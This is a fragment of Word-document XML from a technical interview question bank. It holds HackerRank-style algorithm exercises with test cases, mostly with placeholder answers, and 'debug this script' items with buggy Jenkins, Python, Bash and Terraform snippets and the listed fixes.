        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank stack - balanced brackets with errors: Validate nested (), [], and {} and return the zero-based index of the first invalid character, or -1 when valid. If opening brackets remain, return the index of the earliest unmatched opener. Test cases: '{[()]}' -&gt; -1; '{[(])}' -&gt; 3; '(()' -&gt; 0; ']' -&gt; 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1444. HackerRank queue - castle on the grid: Given a square grid with open and blocked cells, find minimum rook-like moves from start to goal. Test case: grid=['.X.','.X.','...'], start=(0,0), goal=(0,2) -&gt; 3. Also test start=goal -&gt; 0 and an unreachable goal -&gt; -1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank queue - castle on the grid: Given a square grid with open and blocked cells, find minimum rook-like moves from start to goal. Test case: grid=['.X.','.X.','...'], start=(0,0), goal=(0,2) -&gt; 3. Also test start=goal -&gt; 0 and an unreachable goal -&gt; -1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1445. HackerRank heap - running median: For a stream of integers, output the median after every insertion using two heaps and state their invariants. Test cases: [12,4,5,3,8,7] -&gt; [12.0,8.0,5.0,4.5,5.0,6.0]; [-1,-2] -&gt; [-1.0,-1.5].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank heap - running median: For a stream of integers, output the median after every insertion using two heaps and state their invariants. Test cases: [12,4,5,3,8,7] -&gt; [12.0,8.0,5.0,4.5,5.0,6.0]; [-1,-2] -&gt; [-1.0,-1.5].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1446. HackerRank intervals - minimum meeting rooms: Given [start,end) intervals, return minimum rooms required in O(n log n); an ending meeting frees its room before another starts at that time. Test cases: [[0,30],[5,10],[15,20]] -&gt; 2; [[7,10],[10,12]] -&gt; 1; [] -&gt; 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank intervals - minimum meeting rooms: Given [start,end) intervals, return minimum rooms required in O(n log n); an ending meeting frees its room before another starts at that time. Test cases: [[0,30],[5,10],[15,20]] -&gt; 2; [[7,10],[10,12]] -&gt; 1; [] -&gt; 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1447. HackerRank linked lists - cycle entry: Return the node where a singly linked-list cycle begins or None, using O(1) space, and prove Floyd's method. Test cases: 3-&gt;2-&gt;0-&gt;-4 with tail pointing to node 2 -&gt; node 2; 1-&gt;2 with tail pointing to head -&gt; node 1; 1-&gt;2-&gt;None -&gt; None.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank linked lists - cycle entry: Return the node where a singly linked-list cycle begins or None, using O(1) space, and prove Floyd's method. Test cases: 3-&gt;2-&gt;0-&gt;-4 with tail pointing to node 2 -&gt; node 2; 1-&gt;2 with tail pointing to head -&gt; node 1; 1-&gt;2-&gt;None -&gt; None.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1448. HackerRank trees - lowest common ancestor: Given a binary tree and two nodes, return their LCA; explain the change when either node may be absent. Test tree [3,5,1,6,2,0,8,null,null,7,4]: LCA(5,1) -&gt; 3; LCA(5,4) -&gt; 5; missing node -&gt; None in the presence-check version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank trees - lowest common ancestor: Given a binary tree and two nodes, return their LCA; explain the change when either node may be absent. Test tree [3,5,1,6,2,0,8,null,null,7,4]: LCA(5,1) -&gt; 3; LCA(5,4) -&gt; 5; missing node -&gt; None in the presence-check version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1449. HackerRank binary search - machine production: Machines take different days per item. Given a goal, return minimum production days by binary-searching the answer. Test cases: machines=[2,3,2], goal=10 -&gt; 8; [1,3,4], goal=10 -&gt; 7; [5], goal=0 -&gt; 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank binary search - machine production: Machines take different days per item. Given a goal, return minimum production days by binary-searching the answer. Test cases: machines=[2,3,2], goal=10 -&gt; 8; [1,3,4], goal=10 -&gt; 7; [5], goal=0 -&gt; 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1450. HackerRank graphs - shortest reach: Given an unweighted graph and start node, return distances to all other nodes using edge weight 6 and -1 when unreachable. Test case: n=4, edges=[(1,2),(1,3)], start=1 -&gt; [6,6,-1] for nodes [2,3,4]. Also test a graph with no edges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank graphs - shortest reach: Given an unweighted graph and start node, return distances to all other nodes using edge weight 6 and -1 when unreachable. Test case: n=4, edges=[(1,2),(1,3)], start=1 -&gt; [6,6,-1] for nodes [2,3,4]. Also test a graph with no edges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1451. HackerRank graphs - roads and libraries: Find minimum cost to give n cities library access using libraries and undirected roads; handle disconnected components. Test cases: n=3, library=2, road=1, edges=[(1,2),(3,1),(2,3)] -&gt; 4; n=6, library=2, road=5, any edges -&gt; 12.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank graphs - roads and libraries: Find minimum cost to give n cities library access using libraries and undirected roads; handle disconnected components. Test cases: n=3, library=2, road=1, edges=[(1,2),(3,1),(2,3)] -&gt; 4; n=6, library=2, road=5, any edges -&gt; 12.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1452. HackerRank dynamic programming - max subset sum: Return maximum sum of non-adjacent elements. Define empty input as 0 and require choosing an element for non-empty all-negative input. Test cases: [3,7,4,6,5] -&gt; 13; [2,1,5,8,4] -&gt; 11; [-2,-3,-1] -&gt; -1; [] -&gt; 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank dynamic programming - max subset sum: Return maximum sum of non-adjacent elements. Define empty input as 0 and require choosing an element for non-empty all-negative input. Test cases: [3,7,4,6,5] -&gt; 13; [2,1,5,8,4] -&gt; 11; [-2,-3,-1] -&gt; -1; [] -&gt; 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1453. HackerRank dynamic programming - abbreviation: Can string a become b by deleting lowercase letters and optionally capitalizing lowercase letters, while uppercase letters cannot be deleted? Test cases: ('daBcd','ABC') -&gt; True; ('AbcDE','ABDE') -&gt; True; ('AbcDE','AFDE') -&gt; False.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank dynamic programming - abbreviation: Can string a become b by deleting lowercase letters and optionally capitalizing lowercase letters, while uppercase letters cannot be deleted? Test cases: ('daBcd','ABC') -&gt; True; ('AbcDE','ABDE') -&gt; True; ('AbcDE','AFDE') -&gt; False.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1454. HackerRank practical coding - log sessionization: Group unsorted (user_id,timestamp,action) records into sessions where consecutive events are at most 30 minutes apart. Test: u1 events at 10:00, 10:30, 11:01 produce two sessions; events exactly 30 minutes apart stay together; empty input -&gt; [].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank practical coding - log sessionization: Group unsorted (user_id,timestamp,action) records into sessions where consecutive events are at most 30 minutes apart. Test: u1 events at 10:00, 10:30, 11:01 produce two sessions; events exactly 30 minutes apart stay together; empty input -&gt; [].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1455. HackerRank practical coding - API dependency order: Given services and dependencies where A depends on B, return a valid deployment order or report a cycle, including isolated services. Test cases: services=[api,db,cache], dependencies=[(api,db)] -&gt; db before api with cache anywhere; [(a,b),(b,a)] -&gt; cycle error.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank practical coding - API dependency order: Given services and dependencies where A depends on B, return a valid deployment order or report a cycle, including isolated services. Test cases: services=[api,db,cache], dependencies=[(api,db)] -&gt; db before api with cache anywhere; [(a,b),(b,a)] -&gt; cycle error.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1456. HackerRank practical coding - sliding-window rate limiter: Given chronological timestamped requests by user, return rejected indices when each user may make at most k requests in any rolling 60-second window. Test: k=2, requests=[(u1,0),(u1,10),(u1,20),(u2,20),(u1,60),(u1,71)] -&gt; [2]; requests exactly 60 seconds apart are outside the same window.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Coding Exercises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HackerRank practical coding - sliding-window rate limiter: Given chronological timestamped requests by user, return rejected indices when each user may make at most k requests in any rolling 60-second window. Test: k=2, requests=[(u1,0),(u1,10),(u1,20),(u2,20),(u1,60),(u1,71)] -&gt; [2]; requests exactly 60 seconds apart are outside the same window.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Debug This Script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1457. Debug this Jenkinsfile: Find every bug before this pipeline runs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pipeline { agent any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  environment {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    Docker_image = "my-app-image"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    Docker_tag = "latest"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  Stages {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    stage('Checkout Code') {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      steps {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        git ''</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stage('Build') {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      Steps {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        sh 'echo "build application"'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        sh 'mvn clean package'</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stage('deploy') {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      steps {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        Sh 'kubectl apply -f deployment.yaml'</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Bugs: (1) Curly/smart quotes ("..." instead of "...") throughout will cause a Groovy syntax error - Jenkins requires straight quotes. (2) "Stages", "Steps", and "Sh" are capitalized - Jenkins declarative pipeline keywords (stages, steps, sh) are case-sensitive lowercase. (3) The git step has an empty URL ('') so checkout will fail. (4) The pipeline declares Docker_image and Docker_tag environment variables but never uses them anywhere (dead config, and likely meant to be used in a docker build/push stage that's missing entirely). (5) There's no "test" stage despite the environment suggesting a full CI/CD flow, and no post block for cleanup/notification on failure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1458. Debug this Python script: A teammate wrote this CPU monitor and it won't even run. Find every bug.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>import plutil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>import time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>def monitor_cpu(interval = 2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>print("monitoring cpu utilization")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>try :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>while True :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>cpu_usage = plutil.cpu_percent(interval=1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>print(f"Current cpu usage : {cpu_usage}%")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Bugs: (1) "import plutil" should be "import psutil" - plutil doesn't exist, this is a typo/hallucinated module name. (2) The function signature "def monitor_cpu(interval = 2)" is missing a colon at the end. (3) "print(...)" and the try/while block are not indented inside the function body, so they execute at module level immediately, not when monitor_cpu() is called - and monitor_cpu() is never actually called. (4) There's no time.sleep(interval) inside the loop, so it would busy-loop as fast as possible once fixed. (5) Curly/smart quotes around all strings will cause a SyntaxError in real Python. (6) No exception handling around KeyboardInterrupt to exit cleanly, and no return/break condition - it loops forever by design but should at least handle Ctrl+C gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1459. Debug this Bash script: This health check script is supposed to fail loudly on errors but doesn't. Find every bug.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>#!/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>URL=$1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>THRESHOLD=$2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>response=$(curl -s -o /dev/null -w %{http_code} $URL)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>if [ $response == 200 ]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  echo "Healthy"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  echo "Unhealthy, got $response"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>fi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>disk=$(df / | grep / | awk '{ print $5} ' | sed 's/%//g')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>if [ $disk -gt $THRESHOLD ]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  echo "Disk usage critical: $disk%"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Bugs: (1) No "set -euo pipefail" at the top, so the script won't fail loudly on errors as intended - a failed curl or missing variable is silently ignored. (2) The "if [ $response == 200 ]" and the disk usage "if" are missing a "then" keyword (or a newline replacement) - this is a syntax error in Bash; needs "if [ ... ]; then". (3) Unquoted variables ($response, $URL, $disk) can break with word-splitting or if a variable is empty. (4) "-w %{http_code}" should be quoted as '%{http_code}' to prevent shell brace expansion issues. (5) The disk-usage check has no matching "fi" to close the if block. (6) THRESHOLD is used without validating it was actually passed as an argument.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1460. Debug this Terraform snippet: This module fails to plan. Find every bug.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>resource "google_compute_instance" "web" {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  name         = "web-server"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  machine_type = e2-medium</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  zone         = "us-central1-a"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  boot_disk {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    initialize_params {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">      image = "debian-cloud/debian-11"</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network_interface {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    network = google_compute_network.vpc.name</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tags = "web-server"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
